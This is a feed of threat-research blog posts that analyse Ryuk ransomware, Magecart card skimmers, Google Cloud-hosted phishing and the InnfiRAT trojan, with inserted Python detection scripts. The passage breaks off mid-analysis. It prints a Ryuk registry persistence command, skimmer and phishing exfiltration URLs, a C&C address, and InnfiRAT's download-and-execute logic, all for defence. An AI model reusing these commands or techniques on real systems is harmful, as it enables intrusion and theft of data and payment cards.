The tactics used by UC Browser and UC Mini violate Google Play security policies and make it possible for any malicious app to gain entry into a user's device. While 9Apps, an app store for Android apps, is not a malicious site, we searched the domain using VirusTotal, which showed a number of detections:

Fig. 12: VirusTotal search for the domain

It is too early to determine exactly what the UC Browser developers intended with their third-party APK, but it is clear that they are putting users at risk. And with more than 500 million downloads of UC Browser, that is a significant threat. Because UC Browser downloads an unknown third-party app to devices over unsecured channels, those devices can fall victim to man-in-the-middle (MiTM) attacks. Using MiTM, attackers can spy on the device and intercept or change its communications. The UC Browser app's use of unsecured channels also allows attackers to install an arbitrary payload on a device that can perform a variety of activities, such as displaying phishing messages designed to steal personal data, including usernames, passwords, and credit card numbers. Once a user's device has been compromised, and that compromised device connects back at the office, attackers have the ability to establish a foothold in the network, so they can snoop, spread malware, or steal data.
Categories: Security Posts

Examining the Ryuk Ransomware

Zscaler Research - 52 min 35 sec ago
Ryuk ransomware had a disturbingly successful debut, being used to hit at least three organizations in its first two months of activity for more than $640,000 in ransom. Several attacks followed, where the attackers demanded even greater amounts of ransom.

The attackers were able to demand and receive high ransoms because of a unique trait in the Ryuk code: the ability to identify and encrypt network drives and resources, as well as delete shadow copies on the endpoint. By carrying out these actions, the attackers could disable the Windows System Restore option, making it impossible for users to recover from the attack without external backups. Unlike other ransomware, Ryuk is distributed by common botnets, such as Trickbot and Emotet, which have been widely used as banking trojans. In this blog, we'll provide an analysis of how the Ryuk ransomware can encrypt a victim's data while blocking the infected system from restoring the data.

Analysis

The Ryuk dropper contains both 32-bit and 64-bit payloads. The dropper checks whether it is being executed on a 32-bit or 64-bit OS using the "IsWow64Process" API and drops the payload accordingly. It also checks the version of the operating system. If it is executed on Windows XP, it drops the Ryuk payload at "C:\Documents and Settings\Default User\{random-5 char}.exe". If it is executed on Windows Vista or later versions of Windows, it drops the file at "C:\users\Public\{random-5 char}.exe”. Next, it executes the payload using the ShellExecuteW API.

Persistence mechanism

Ryuk adds the following registry key so it will execute at every login. It uses the command below to create the registry key:

""C:\Windows\System32\cmd.exe" /C REG ADD "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "svchos" /t REG_SZ /d "C:\Users\Public\{random-5 char}.exe" /f"

Process injection

Ryuk injects its main code into several remote processes. It enumerates running processes by calling the CreateToolhelp32Snapshot API and injects its code into all of them except the ones named explorer.exe, lsaas.exe and csrss.exe, and those running under the NT AUTHORITY account. Ryuk ransomware terminates processes and stops services contained on a predefined list. These processes and services are mostly antivirus tools, databases, backups, and other software. The screenshot below shows the list of services stopped by Ryuk.

Figure 1: The list of services disabled by the Ryuk ransomware.

The screenshot below shows the list of processes terminated by Ryuk.

Figure 2: The list of processes terminated by the Ryuk ransomware.

Ryuk also deletes shadow copies and other backup storage files by using a .BAT file so that the infected system can’t restore data. Below is the list of commands used by Ryuk to perform these deletions.

Figure 3: The list of commands used by Ryuk ransomware to delete shadow copies and other backup storage files.

Encryption and similarity with Hermes ransomware

Ryuk uses a combination of RSA (asymmetric) and AES (symmetric) encryption to encrypt files. Ryuk embeds an RSA key pair in which the RSA private key is already encrypted with a global RSA public key. The sample generates an AES-256 key for each file and encrypts that file with the key. The AES key is then encrypted with the embedded public key and appended to the end of the encrypted file. If all the samples contained the same RSA key pair, then after getting access to one private key it would be easy to decrypt all of the files. But Ryuk contains a different RSA key pair for every sample. Some samples append the ".RYK" extension and some don't append any extension after encrypting the files.

Ryuk has a feature in common with Hermes ransomware. During encryption, Ryuk adds a marker to the encrypted file using the keyword “HERMES”. Ryuk checks for the HERMES marker before encrypting any file to know whether it has already been encrypted. The screenshot below displays the HERMES marker and the encrypted AES key appended at the end of the encrypted file.

Figure 4: The HERMES marker and the encrypted AES key.

Ryuk encrypts files on every drive and network share reachable from the infected system. It has whitelisted a few folders, including “Windows, Mozilla, Chrome, Recycle Bin, and Ahnlab”, so it won’t encrypt files inside these folders. Ryuk drops its ransom note, named RyukReadMe.txt, in every directory. Ryuk asks for the ransom in bitcoin, providing the bitcoin address in the ransom note. Ryuk contains different templates for the ransom note. Below is a screenshot of the RyukReadMe.txt file.

Figure 5: Ryuk ransomware ransom note.

After completing the encryption, Ryuk creates two files. One is “Public” and contains an RSA public key, while the second is “UNIQUE_ID_DO_NOT_REMOVE” and contains a unique hardcoded key.

Conclusion

While most ransomware is spread using spam email and exploit kits, Ryuk is delivered as a payload of the Emotet and Trickbot malware. Looking at the encryption process and ransom demands, Ryuk is targeting big enterprises in the hope of large payoffs. The Zscaler ThreatLabZ team continues to monitor this threat to ensure that Zscaler customers are protected.

IOCs

MD5
5AC0F050F93F86E69026FAEA1FBB4450
6CDCB9F86972EFC4CFCE4B06B6BE053A
31BD0F224E7E74EEE2847F43AAE23974

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Rajdeepsinh Dodia and Amandeep Kumar are security researchers on the Zscaler ThreatLabZ team.
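The HERMES marker and the per-directory ransom note described above give a responder two cheap triage signals on a suspected host. The following is an added example, not Zscaler's code and not derived from the Ryuk sample: it walks a directory tree, reports files whose tail contains the "HERMES" keyword (with or without the ".RYK" extension, since the post notes some samples add none) and lists directories holding RyukReadMe.txt. The exact footer layout is not given in the post, so the scanner only assumes the marker sits within the last 4 KiB of a file; the sample tree it builds is constructed data.

```python
"""Triage scan for the HERMES marker that Ryuk writes into encrypted files.

Added example, not Zscaler's code and not derived from the Ryuk sample. It
relies only on what the post states: Ryuk writes the keyword "HERMES" into
each encrypted file, appends the RSA-encrypted AES key at the end, may or
may not add a ".RYK" extension, and drops RyukReadMe.txt in every
directory. The footer layout is an assumption: the scanner only looks for
the keyword within the last TAIL_BYTES bytes of each file.
"""
import os
import tempfile

MARKER = b"HERMES"
RYUK_EXT = ".RYK"
RANSOM_NOTE = "RyukReadMe.txt"
TAIL_BYTES = 4096  # assumption: marker and appended key sit in the last 4 KiB


def has_hermes_marker(path):
    """True if the tail of the file contains the HERMES keyword."""
    size = os.path.getsize(path)
    with open(path, "rb") as fh:
        fh.seek(max(0, size - TAIL_BYTES))
        return MARKER in fh.read()


def scan_tree(root):
    """Walk root and return (marked_files, ransom_note_dirs), both sorted and
    relative to root. Marked files are reported whether or not they carry the
    .RYK extension, since the post notes some samples add none."""
    marked, note_dirs = [], []
    for dirpath, _dirs, files in os.walk(root):
        if RANSOM_NOTE in files:
            note_dirs.append(os.path.relpath(dirpath, root))
        for name in files:
            if name == RANSOM_NOTE:
                continue
            full = os.path.join(dirpath, name)
            try:
                if has_hermes_marker(full):
                    marked.append(os.path.relpath(full, root))
            except OSError:
                continue  # unreadable file: skip rather than abort the triage
    return sorted(marked), sorted(note_dirs)


def split_by_extension(marked):
    """Separate marked files into those with and without the .RYK extension."""
    with_ext = [p for p in marked if p.upper().endswith(RYUK_EXT)]
    without_ext = [p for p in marked if not p.upper().endswith(RYUK_EXT)]
    return with_ext, without_ext


def build_sample_tree():
    """Create a constructed directory tree (sample data, not real Ryuk output)."""
    root = tempfile.mkdtemp(prefix="ryuk_triage_")
    os.makedirs(os.path.join(root, "docs"))
    # constructed "encrypted" file with the .RYK extension: body, marker, fake 256-byte key blob
    with open(os.path.join(root, "docs", "report.docx.RYK"), "wb") as fh:
        fh.write(b"\xaa" * 2000 + MARKER + b"\x00" * 256)
    # constructed "encrypted" file whose name was left unchanged
    with open(os.path.join(root, "budget.xlsx"), "wb") as fh:
        fh.write(b"\xbb" * 10000 + MARKER + b"\x00" * 256)
    # clean file that must not be reported
    with open(os.path.join(root, "notes.txt"), "wb") as fh:
        fh.write(b"quarterly notes\n" * 100)
    # ransom notes in both directories, as the post describes
    for sub in ("", "docs"):
        with open(os.path.join(root, sub, RANSOM_NOTE), "w") as fh:
            fh.write("constructed placeholder note\n")
    return root


if __name__ == "__main__":
    sample = build_sample_tree()
    marked, notes = scan_tree(sample)
    with_ext, without_ext = split_by_extension(marked)
    print("marked files:", marked)
    print("marked without .RYK:", without_ext)
    print("ransom notes in:", notes)
```

Reading only the tail of each file keeps the scan cheap enough to run across a whole share; a file flagged here should still be confirmed against the sample's actual footer before any recovery decision is taken.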

Magecart hits again, leveraging compromised sites and newly registered domains

Zscaler Research - 52 min 35 sec ago
During alert monitoring, ThreatLabZ researchers came across multiple cases of shopping sites being compromised and injected with a skimming script. This injected script looks for the payment method and personally identifiable information (PII) and captures the supplied financial information, which is then sent to an adversary-controlled gate server even before the user hits the submit button. There have been multiple reports published related to Magecart activity, and ThreatLabZ has blogged about the hacker group’s activities in the past. (Read previous blogs from September 2018 and July 2019.) In this blog, we will provide an overview of the current skimming campaigns with an analysis of those that use compromised sites to host the skimmer code and those that use newly registered domains.

The following screen capture shows the Magecart hits we observed over the last 90 days. The activity appears to be fairly consistent week to week, with a spike at the end of the analysis period, and we believe it is likely to continue.

Figure 1: Hits on compromised sites over 90 days (x-axis=date, y-axis=hits)

Most of the impacted websites are in the shopping category. The following graph shows the cloud-wide statistic for the number of unique domains per category for the sites impacted.

Figure 2: URL categories of impacted sites (x-axis=URL category, y-axis=unique domain counts)

This Magecart-based skimming campaign did not reveal any novel tactics, tools, or procedures, but it seems to be more structured in terms of the scripts being used across multiple compromises, similar gate URL parameter patterns, and the algorithm used for data encoding. The cycles we observed were generally the same, but we did see some differences. Some use obfuscation to hide the script injection code and use another compromised site for hosting the skimmer script, while others make use of newly registered domains for skimmer script hosting. Regardless of the loading script, the skimmer code possesses little to no obfuscation.

Cycle 1: Compromised site loads skimmer code from another compromised site

The following image shows a Fiddler session to demonstrate the skimming chain.

Figure 3: Fiddler session for Magecart skimming

In these skimming campaigns, we can see compromised sites sending captured payment information to domains that are either newly registered or compromised and under the control of an adversary. In the following example, the gate site is compromised as well and was registered on 2013-03-19.

Figure 4: Example of injected script and skimmer code

The way this skimmer code operates is to wait for the user to fill in the personal information and payment method and capture it all before the user hits the submit button. This captured information is then encoded using the Base64 algorithm and sent to the gate URL in a GET request.

Figure 5: Skimmer script sending base64-encoded PII and payment information in a GET request

Cycle 2: Compromised site loads skimmer code from a newly registered domain

As shown in the image below, the skimming script is being hosted on a domain registered just 10 days before this analysis.

Figure 6: Compromised site leveraging skimmer script from a newly registered domain

All the skimmer scripts we’ve identified so far are similar, and we observed the following common gate URL pattern:

hxxps://domain/{path}.(php|js)?hash=[base64data]

Figure 7: Skimmer script differences

We saw multiple cases where the same skimmer code locations were being used in multiple compromised sites, including:

custommagnetsdirect[dot]com/catalog/view/javascript/jquery/jquery.sticky.js
matteola[dot]com/js/varien/js.js

The image below shows examples of skimmer code locations being used for multiple compromised sites.

Figure 8: The same skimmer code locations used in multiple compromised sites

Conclusion

Magecart has been successful for years because attackers have improved their techniques for injecting malicious code and hiding it from detection. Now, we are seeing attackers able to steal payment card information before it is even submitted. Zscaler ThreatLabZ actively tracks such campaigns and protects customers from skimming and other types of data-stealing attacks.

Appendix

Common skimmer JS URL patterns
/5d1cbc8c073d4.js
/baypressservices/baypr.js
/check_cvv2_number_script.js
/datetimepicker/bootstrap-datetimepicker.min.js
/images/js/googleapi.js
/javascript/checkcheckout.js
/5d4cdc4cdf344.js
/js/afterpay/checkout/idev_onestep.js
/js/check_analystic.js
/js/extjs/fix-defer-after.js
/js/footer-link.js
/js/front-scripts.min.js
/js/lib/ccard.js
/js/mage/cookies.js
/js/mage/google.js
/js/prototype/prototype.js
/js/scriptaculous/print.js
/varien/email.js
/varien/js.js
/varien/mail.js
/my/vmart.js
/qcore.js
/rimzoneonline/code.js
/silver/acor.js
/wp-includes/js/jquery/jquery.js

Bad domains                          Creation date
api-googles[dot]com                  2019-03-30T18:40:29Z
cloudflara[dot]org                   2019-07-10T19:16:22Z
developer-js[dot]info                2019-03-07T21:29:25Z
facebookfollow[dot]com               2019-07-21T02:29:39Z
googletagmanager-service[dot]com     2019-02-09T23:28:49Z
gooqleadvstat[dot]com                2019-09-13T11:22:10Z
jquery-cdn[dot]top                   2018-09-28T07:41:02Z
jquery-js[dot]com                    2017-01-02T11:21:35Z
jquery[dot]su                        2019-02-27T19:12:36Z
jquerycodemagento[dot]com            2019-08-11T13:05:43Z
magento-security[dot]org             2017-11-14T16:32:41Z
magento-track[dot]com                2018-12-28T20:44:11Z
script-analytics[dot]com             2019-08-13T22:16:38Z
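The gate URL pattern and the appendix of skimmer script paths above are enough to build a first-pass detector over outbound web logs. The following is an added example, not Zscaler's code: it matches requests against the reported pattern hxxps://domain/{path}.(php|js)?hash=[base64data], base64-decodes the hash parameter and looks for a Luhn-valid card number in the result, and separately flags script loads whose path matches entries from the appendix list (a subset is reproduced in the block). The "timestamp client method url" log layout, the sample lines and the hosts gate.example, cdn.example and shop.example are constructed for the example.

```python
"""Spot Magecart gate requests and known skimmer script loads in proxy logs.

Added example, not Zscaler's code. It applies two observations from the
post: the common gate URL pattern hxxps://domain/{path}.(php|js)?hash=[base64data]
(captured form data base64-encoded into a GET parameter) and the list of
skimmer JS URL paths in the appendix (a few are reproduced here). The log
layout "timestamp client method url" and the sample lines are constructed
for this example; gate.example and cdn.example are placeholder hosts.
"""
import base64
import binascii
import re
from urllib.parse import unquote, urlparse

# Gate pattern from the post: path ending in .php or .js with a hash= query parameter
GATE_RE = re.compile(r"^https?://[^/]+/.*\.(?:php|js)\?hash=[A-Za-z0-9+/=%_-]+$")
# Card-number candidates: 13 to 19 digits, optionally separated by spaces or dashes
PAN_RE = re.compile(r"(?<!\d)(?:\d[ -]?){12,18}\d(?!\d)")
# Subset of "Common skimmer JS URL patterns" from the appendix
KNOWN_SKIMMER_PATHS = (
    "/varien/js.js",
    "/js/lib/ccard.js",
    "/check_cvv2_number_script.js",
    "/js/mage/google.js",
    "/wp-includes/js/jquery/jquery.js",
)


def luhn_ok(digits):
    """Luhn checksum, used to separate real card numbers from random digit runs."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def decode_hash_param(url):
    """Return the base64-decoded hash= payload as text, or None if absent or invalid."""
    for part in urlparse(url).query.split("&"):
        key, _, value = part.partition("=")
        if key != "hash":
            continue
        raw = unquote(value)
        raw += "=" * (-len(raw) % 4)  # restore padding a skimmer may have stripped
        try:
            return base64.b64decode(raw, validate=True).decode("utf-8", "replace")
        except (binascii.Error, ValueError):
            return None
    return None


def find_pans(text):
    """Return Luhn-valid card numbers (digits only) found in decoded text."""
    pans = []
    for m in PAN_RE.finditer(text):
        digits = re.sub(r"[ -]", "", m.group(0))
        if luhn_ok(digits):
            pans.append(digits)
    return pans


def is_known_skimmer_path(url):
    """True if the URL path ends with one of the appendix skimmer script paths."""
    return urlparse(url).path.endswith(KNOWN_SKIMMER_PATHS)


def analyze_log(lines):
    """Return {'gate_requests': [(url, pans)], 'skimmer_script_loads': [url]}."""
    result = {"gate_requests": [], "skimmer_script_loads": []}
    for line in lines:
        fields = line.split()
        if len(fields) < 4:
            continue
        url = fields[3]
        if GATE_RE.match(url):
            decoded = decode_hash_param(url)
            result["gate_requests"].append((url, find_pans(decoded) if decoded else []))
        elif is_known_skimmer_path(url):
            result["skimmer_script_loads"].append(url)
    return result


def build_sample_log():
    """Constructed proxy lines: a skimmer script load, a gate beacon, and benign traffic."""
    form_data = "cc=4111111111111111&exp=12/24&cvv=123&name=Jane Doe&email=jane@example.com"
    encoded = base64.b64encode(form_data.encode()).decode()  # 4111... is a well-known test PAN
    return [
        "2019-10-01T12:00:01Z 10.0.0.5 GET https://cdn.example/js/varien/js.js",
        "2019-10-01T12:00:09Z 10.0.0.5 GET https://gate.example/api/track.php?hash=" + encoded,
        "2019-10-01T12:00:12Z 10.0.0.7 GET https://shop.example/checkout/onepage/",
    ]


if __name__ == "__main__":
    report = analyze_log(build_sample_log())
    for url, pans in report["gate_requests"]:
        print("gate request:", url[:60] + "...", "card numbers:", pans)
    print("skimmer script loads:", report["skimmer_script_loads"])
```

The Luhn step matters because a GET parameter named hash carrying base64 is not rare on its own; a decoded payload that contains a checksum-valid card number is what turns the pattern match into an incident.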

Phishing attacks abusing appspot.com and web.app domains on Google Cloud

Zscaler Research - 52 min 35 sec ago
In July, Zscaler ThreatLabZ posted a blog about a rise in the use of Microsoft Azure domains to host phishing attacks. Our researchers recently detected similar activity on the Google domains Appspot.com and Web.app. Appspot.com is a cloud computing platform for developing and hosting web applications in Google-managed data centers. Web.app is a mobile platform used for building mobile apps hosted by Firebase, which is Google’s mobile app platform. These campaigns use SSL certificates issued by Appspot.com and Web.app, and they have well-designed login pages that attempt to spoof popular brands widely used in business, such as Dropbox Business, Microsoft Outlook and SharePoint, and DocuSign. They are designed to capture login credentials, which are sent to a remote server. In the analysis that follows, we’ll describe the techniques these campaigns use to avoid detection and we’ll show the phishing domains and the locations where the user credentials are being sent. As of this date, many of these subdomains on appspot.com and web.app are not being flagged by VirusTotal.

Fig 1: VirusTotal detections for the subdomains

Web.app hosted phishing pages

The following screenshots are phishing pages of some of the sites that have used an SSL certificate issued by Web.app.

Fig 2: Microsoft login phishing page

Fig 3: SSL certificate page of the hosted phishing URL

Appspot.com hosted phishing pages

Fig 4: Google Drive login phishing page

Fig 5: Outlook login phishing page

Fig 6: Dropbox login phishing page

Fig 7: DocuSign login phishing page

Fig 8: OneDrive login phishing page

Fig 9: OneDrive login phishing page

Fig 10: OneDrive login phishing page

Evasion techniques

This is a sophisticated phishing campaign, as demonstrated by the well-designed phishing pages that are difficult to distinguish from legitimate pages. In addition, the attackers are using the latest tactics to evade detection by scan engines, with most of the code written in an external JavaScript file. This filename is 32 characters long and different for every site. Below is the source code of the phishing pages; the highlighted part is the external JavaScript mentioned above.

Fig 11: Source code of phishing page

Fig 12: Source code of phishing page

In the above landing page source code of the phishing URL, there is little content, no brand name, and none of the catchy strings that are common in most phishing campaigns. This enables it to bypass many automatic analysis engines and extend its survival. The following screenshots show the code and the location where the user credentials are being sent. This code is present in the randomly named, externally added JavaScript files.

Fig 13: Location used by the attacker to collect user credentials

Fig 14: Location used by the attacker to collect user credentials

The following figure shows a sample packet capture for this data being sent to the attacker’s site.

Fig 15: Packet capture for the data that has been sent to the attacker’s site

Zscaler is actively blocking these phishing pages. The following screen capture shows Zscaler detection for one of these pages:

Fig 16: Zscaler successfully detects these domains

Phishing domains

As of the writing of this blog, we have collected the following phishing domains.

uy67dass[.]appspot[.]com
ja8fspxzosaa[.]appspot[.]com
gjf9pxzosa[.]appspot[.]com
egoew023pzas[.]appspot[.]com
vhkad03pas[.]appspot[.]com
kda8gazxa[.]appspot[.]com
adgkao93pz[.]appspot[.]com
l9rwpodsxcs[.]appspot[.]com
cvgfsaz[.]appspot[.]com
jga9spzas[.]appspot[.]com
jjad9gdpxzsa[.]appspot[.]com
vadgka932oa[.]appspot[.]com
ls9ixosdsasa[.]appspot[.]com
qwsa92oozxa[.]appspot[.]com
adlg402ooz[.]appspot[.]com
bnb932psiz[.]appspot[.]com
authofisaiz[.]web[.]app
Telecomm-uk[.]web[.]app
f45ghdsas[.]appspot[.]com
Derr9qepzxas[.]appspot[.]com
Vgdikad9oqww[.]appspot[.]com
dsa3aszxsa[.]appspot[.]com
weotwe0dpa[.]appspot[.]com
Wy6fxsa[.]appspot[.]com
Yu56sdzsa[.]appspot[.]com
Vbhg45as[.]appspot[.]com
Hds9pzoas[.]appspot[.]com
khs9dpas[.]appspot[.]com
u76dfsdasa[.]appspot[.]com
y56fds[.]appspot[.]com
vfhgj3sz[.]appspot[.]com
eyq246ddpoas[.]appspot[.]com
h45dsagga[.]appspot[.]com
sds43dza[.]appspot[.]com
yt76uyhxzz[.]appspot[.]com
jh54dfaz[.]appspot[.]com
ytyfazxz[.]appspot[.]com

Where information is sent

Below are the locations where the phishing page is sending credentials entered by the user.

https://osipz[.]c3y5-tools[.]com/1[.]newsvpost_ads_auto/loading[.]php
https://osipz[.]kute[.]pw/1[.]newsvpost_ads/loading[.]php
https://xotpe[.]c3y5-tools[.]com/1[.]newsvpost_ads/loading[.]php
https://uiufz[.]c3y5-tools[.]com/1[.]newsvpost_ads/loading[.]php
https://xotpe[.]kute[.]pw/1[.]newsvpost_ads/loading[.]php
https://xotpe[.]bugcart[.]com/1[.]newsvpost_ads/loading[.]php
https://xotpe[.]dtvd[.]biz/1[.]newsvpost_ads/loading[.]php
https://uy6x[.]c3y5-tools[.]com/1[.]newsvpost_ads/loading[.]php
https://h76fg[.]c3y5-tools[.]com/1[.]newsvpost_ads/loading[.]php
https://hjif[.]c3y5-tools[.]com/1[.]newsvpost_ads/loading[.]php
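The evasion traits described above (a near-empty landing page with no brand string, the real logic in an external JavaScript file with a 32-character random name, and credentials posted to a fixed set of drop-off locations) can be turned into page-level heuristics for a URL-analysis pipeline. The following is an added example, not Zscaler's code: it parses a page's HTML, counts visible text, flags external scripts whose name is exactly 32 alphanumeric characters, and checks a URL against the hosts and path from the "Where information is sent" list. The two HTML samples, the 200-character "little content" threshold and the brand word list are constructed assumptions for this example; Contoso is a placeholder brand.

```python
"""Heuristics for the sparse phishing landing pages described in the post.

Added example, not Zscaler's code. It encodes the evasion traits the post
reports: almost no visible content, no brand names in the landing HTML,
and the real logic pulled in from an external JavaScript file whose name
is 32 random characters; plus a check of a URL against the credential
drop-off locations listed under "Where information is sent". The HTML
samples and the thresholds below are constructed assumptions.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

RANDOM_STEM_LEN = 32
MIN_VISIBLE_CHARS = 200  # assumption: below this the page counts as "little content"
BRAND_WORDS = ("microsoft", "outlook", "sharepoint", "onedrive", "dropbox", "docusign", "google")
# Hosts and path from the post's exfiltration URLs, with the [.] defanging undone
EXFIL_HOSTS = {h.replace("[.]", ".") for h in ("c3y5-tools[.]com", "kute[.]pw", "bugcart[.]com", "dtvd[.]biz")}
EXFIL_PATH_RE = re.compile(r"/1\.newsvpost_ads(?:_auto)?/loading\.php$")


class _PageScan(HTMLParser):
    """Collect script src attributes and count visible text characters."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self.text_chars = 0
        self._in_code = 0  # depth inside <script>/<style>, whose text is not visible

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.scripts.append(src)
        if tag in ("script", "style"):
            self._in_code += 1

    def handle_endtag(self, tag):
        if tag in ("script", "style") and self._in_code:
            self._in_code -= 1

    def handle_data(self, data):
        if not self._in_code:
            self.text_chars += len(data.strip())


def random_stem_scripts(srcs):
    """Scripts whose file name is exactly 32 alphanumeric characters plus .js."""
    hits = []
    for src in srcs:
        name = urlparse(src).path.rsplit("/", 1)[-1]
        stem, _, ext = name.rpartition(".")
        if ext.lower() == "js" and len(stem) == RANDOM_STEM_LEN and stem.isalnum():
            hits.append(src)
    return hits


def assess_page(html):
    """Score a landing page; higher means more of the post's evasion traits are present."""
    scan = _PageScan()
    scan.feed(html)
    lowered = html.lower()
    brands = [b for b in BRAND_WORDS if b in lowered]
    random_scripts = random_stem_scripts(scan.scripts)
    reasons = []
    if random_scripts:
        reasons.append("external script with 32-character random name")
    if scan.text_chars < MIN_VISIBLE_CHARS:
        reasons.append("almost no visible content")
    if random_scripts and not brands:
        reasons.append("logic externalized and no brand string in landing HTML")
    return {
        "scripts": scan.scripts,
        "random_stem_scripts": random_scripts,
        "visible_text_chars": scan.text_chars,
        "brand_mentions": brands,
        "score": len(reasons),
        "reasons": reasons,
    }


def is_known_exfil_url(url):
    """True if the URL points at one of the credential drop-off hosts and paths from the post."""
    parsed = urlparse(url)
    host = (parsed.hostname or "").lower()
    on_host = host in EXFIL_HOSTS or any(host.endswith("." + h) for h in EXFIL_HOSTS)
    return on_host and bool(EXFIL_PATH_RE.search(parsed.path))


# Constructed sample: a sparse landing page of the kind the post describes
SAMPLE_PHISH_HTML = """<html><head><title>Sign in</title>
<script src="/a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6.js"></script></head>
<body><div id="app"></div></body></html>"""

# Constructed sample: an ordinary page with visible text and a normally named script
SAMPLE_BENIGN_HTML = (
    "<html><head><script src='/static/app.min.js'></script></head><body><h1>Contoso Mail</h1><p>"
    + "Contoso Mail lets your team read, send and organize messages from any device. " * 4
    + "</p></body></html>"
)

if __name__ == "__main__":
    for label, html in (("phish", SAMPLE_PHISH_HTML), ("benign", SAMPLE_BENIGN_HTML)):
        verdict = assess_page(html)
        print(label, "score", verdict["score"], verdict["reasons"])
```

The score is deliberately additive rather than a single rule, because each trait on its own is common on legitimate single-page applications; the combination of an empty shell, an externalized random-name script and no brand text is what the post identifies as the tell.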

InnfiRAT: A new RAT aiming for your cryptocurrency and more

Zscaler Research - 52 min 35 sec ago
Recently, the Zscaler ThreatLabZ team came across a new RAT called InnfiRAT, which is written in .NET and designed to perform specific tasks from an infected machine. This blog provides an analysis of this new RAT, including the way it communicates, all the tasks it performs, and the information it steals.

Background

As with just about every piece of malware, InnfiRAT is designed to access and steal personal information on a user's computer. Among other things, InnfiRAT is written to look for cryptocurrency wallet information, such as Bitcoin and Litecoin. InnfiRAT also grabs browser cookies to steal stored usernames and passwords, as well as session data. In addition, this RAT has screenshot functionality so it can grab information from open windows. For example, if the user is reading email, the malware takes a screenshot. It also checks for other applications running on the system, such as an active antivirus program.

InnfiRAT sends the data it has collected to its command-and-control (C&C) server and requests further instructions. The C&C can also instruct the malware to download additional payloads onto the infected system.

Technical analysis

1) Before executing the main payload, the malware first checks whether the file is executing from the %AppData% directory with the name NvidiaDriver.exe. If not, a web request is sent to “iplogger[.]com/1HEt47" (possibly to check network connectivity).

2) It records all the running processes in an array, then iterates through each process and checks whether any process is running with the name NvidiaDriver.exe. If so, the malware kills that process and waits for it to exit.

Figure 1: Checks execution location, terminates process with name NvidiaDriver

3) InnfiRAT copies itself as %AppData%/NvidiaDriver.exe and executes it from %AppData% before terminating the current process.

Figure 2: The malware makes a copy of itself in %AppData%

4) After confirming the path of file execution, it writes a Base64-encoded PE file in memory, which is later decoded to its actual format and loaded after changing the entry point of the file. This is also a .NET executable and contains the actual functionality of the malware.

Figure 3: Embedded PE file in encoded form

Figure 4: Embedded PE file is decoded and executed

Analysis of embedded .NET executable

All the strings inside the file are encoded with a custom encoding scheme that utilizes the XOR operation.

Figure 5: Strings decoding logic

As execution of the malware starts, it checks for the presence of a VM environment. It does so by checking the return value from the routine JкыnеюwPреюLLщzьhdкXoJxбюHхрйFWрDлнруG7574208083337. If the return value is equal to the first value, enum[0], defined in the enum shown below, it continues execution; otherwise it terminates.

Figure 6: User-defined enum structure

After performing the VM checks, the malware obtains the country and HWID information of the machine it is running on. To obtain the country information, it calls the routine EjarVhXфf8752612307563884480() [FetchNetworkInfo] and fetches the Country key value from the returned data in JSON format. Similarly, to obtain the HWID, it calls the routine ubобмдGogBлzWKrgrыaZucвлC33208440168().

Anti-VM checks

Inside the JкыnеюwPреюLLщzьhdкXoJxбюHхрйFWрDлнруG7574208083337() [VMDetection] routine:

Note: All the enum values are referenced using enum[index] during analysis, where the index starts from 0.

1. Performs a WMI query to obtain the following information:
"Manufacturer"
"Caption"
"Name"
"ProcessorId"
"NumberOfCores"
"NumberOfLogicalProcessors"
"L2CacheSize"
"L3CacheSize"
"SocketDesignation"

It then checks, one by one, whether the manufacturer contains one of the strings below and returns the enum value specified:
“VBoxVBoxVBox”             returns enum[2]
“VMwareVMware”             returns enum[1]
“Prl hyperv”               returns enum[3]
“Microsoft Corporation”    returns enum[4]

2. A WMI query is performed again, this time to obtain the following information:
"DeviceID"
"MediaType"
"Model"
"PNPDeviceID"
"SerialNumber"

A check is performed whether the PnpDeviceId contains one of the strings below and returns the enum value specified:
“VBOX_HARDDISK”            returns enum[2]
“VEN_VMWARE”               returns enum[1]

If none of the above conditions match, it returns enum[0].

Machine network information

Inside the EjarVhXфf8752612307563884480() [FetchNetworkInfo] routine: A web request is sent to the URL https://ipinfo[.]io/json and the received data is returned from the function.
The received data contains the following information:
"ip"
"city"
"region"
"country"
"loc"
"postal"
"org"

Figure 7: Web request being made

Network communication

Inside the мMлFкCцеGPбiбqюK1559516831() [CreateDuplexChannel] routine: InnfiRAT sets up a duplex channel with the name “IVictim” using DuplexChannelFactory:

tcp://62[.]210[.]142[.]219:17231/IVictim

Figure 8: Creating a duplex channel with C&C server

After forming the duplex channel with the name IVictim, it uses the IVictim interface, which contains the following methods:
“Subscribe”
“CompleteTask”
“GetDlls”
“AvailableTasks”

Figure 9: Available methods in the IVictim interface

Inside the SуkdVkцiшkUояUuчPуюяmмuty187968776() [SubscribeVictim] routine: InnfiRAT calls the Subscribe method from the IVictim interface with login = “innfiniti”

Figure 10: The subscribe method from the IVictim interface is invoked

Inside the хaxeYхсиghIжNпDмвQюwkуpкgимuбсфbnдбMвMC67210633684721828() [GetAndExecuteSpecifiedTask] routine: InnfiRAT obtains the tasks inside a UserTask list by invoking AvailableTasks, where UserTask has the following keys:
“ID”
“Action”
“URL”
“FinalPoint”
“Current”
“Status”
“Country”
“RunSilent”
“Argument”

It iterates through each task. On each iteration, it first checks that the Country value received is equal to “ALL” OR to the one present in the BasicInfoVictim class, which was obtained earlier, AND that the action to perform is "DownAndEx" AND that the URL value is available.

If the above conditions match, the CompleteTasks method is called with three arguments:
“login”
“hwid”
“TaskID”

The RAT calls the routine rLPсаWFоWcTjzпTэBFWkъмзтшпD147152108377454681517643543() [ExecuteFile] with three arguments to execute the file:
Arg1 = Path of the file to be executed [obtained from the URL]
Arg2 = Arguments to the file to be executed [obtained from the Argument key of the current UserTask element]
Arg3 = true/false [obtained from the RunSilent key of the current UserTask element]

After iterating all items in the UserTask list, it sleeps for 30,000 milliseconds.

Figure 11: Country, action, and URL checks are performed and the specified task is completed

Process checks

